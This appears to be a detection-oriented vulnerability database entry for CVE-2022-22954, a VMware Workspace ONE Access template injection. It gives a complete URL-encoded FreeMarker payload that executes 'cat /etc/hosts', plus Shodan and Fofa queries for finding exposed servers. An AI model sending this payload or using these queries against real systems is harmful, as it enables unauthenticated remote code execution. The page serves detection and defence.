🔙 목록으로 돌아가기

CVE-2022-22954: VMware Workspace ONE Access - Server-Side Template Injection

TitleVMware Workspace ONE Access - Server-Side Template Injection
Authorsherlocksecurity
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
RemediationApply the latest security patches provided by VMware to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.94444
CVE IDCVE-2022-22954
CWE IDCWE-94
Shodan Queryhttp.favicon.hash:-1250474341
Fofa Queryicon_hash=-1250474341app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize"
Tags cve2022 cve workspaceone kev tenable packetstorm vmware ssti vkev vuln

🔍 Vulnerability Description

VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.

🌐 HTTP Request

GET /catalog-portal/ui/oauth/verify?error&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-22954.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-22954.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A